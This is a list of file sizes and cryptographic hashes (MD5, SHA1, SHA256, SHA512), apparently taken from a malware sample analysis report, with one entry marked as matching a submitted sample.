SHA512: d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

Filesize: 944B
MD5: b8b57459858c5ea0c76b88922d7a0b37
SHA1: 9a102b358e31fc79315e24603947558c119afad3
SHA256: 2d005bc789565b275d0587ba2ecc42b2eadd81d80aa77aff4e3432a2e3e70dc6
SHA512: ffc443124f35a267f7ed85d0444040da0cadcbb3ceb1293f3186f34bda75bbd778e6dc9806903aed46b053178108714dcc4dec4cce3229bb7d5808b37fb6cc54

Filesize: 944B
MD5: ef72c47dbfaae0b9b0d09f22ad4afe20
SHA1: 5357f66ba69b89440b99d4273b74221670129338
SHA256: 692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA512: 7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

Filesize: 944B
MD5: 98baf5117c4fcec1692067d200c58ab3
SHA1: 5b33a57b72141e7508b615e17fb621612cb8e390
SHA256: 30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51
SHA512: 344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

Filesize: 944B
MD5: 9948df3a61230068601b6cf5f5ae6195
SHA1: b6cd3118ae6ae8a0c7c2707700616a32619888a1
SHA256: 8eb4591930c695e7e8dc6e938d14419ef957b54241bb376635a999ac744b9db8
SHA512: af80d545ed24cece281b033961905ad139a1cc0e8082ca5a114c58e0cad18bed5a4f881400436d6b5eafcff3d9e37d4c16bcc41771ab9f20613a7805bedf8f4c

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 254KB
MD5: b840d3fa729c3e32debff348311c5e74
SHA1: a3c857ebffc0e31d4983dc488849088a5515f1f4
SHA256: bf06c2b8760d163e7de3c4443101c7598056fc0ab552ac1638cca5466dfd3a8c
SHA512: 6e6592a39ed14d29dd1c5562e919cb01b8683e3bcc80053c9157417b00140fbfe488dd1676d673ccc8d09491e5ff55ee1357a3dce2cfee8bab94e909d1217d74

Filesize: 65KB (identical hashes to the submitted sample)
MD5: 5ff4a7e0fefe94b3bbf86f2137577ff2
SHA1: 67d9e82ef85881813228e902fd7880e0ceba20b9
SHA256: a562d44e4bf6ec4f8a15c420bc3343f56011b2b454862869e01471075cba1a7e
SHA512: 05edf0d3bc2da186f6a159ef6e5c6f0456fc0979e188c8e8cb62799e0c663515dd9d4aaf631ac8f7830934a618e6eca5fd94e0e1d39d14ee9fbf68e97e8319a4

Filesize: 2KB
MD5: 4028457913f9d08b06137643fe3e01bc
SHA1: a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14
SHA256: 289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58
SHA512: c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b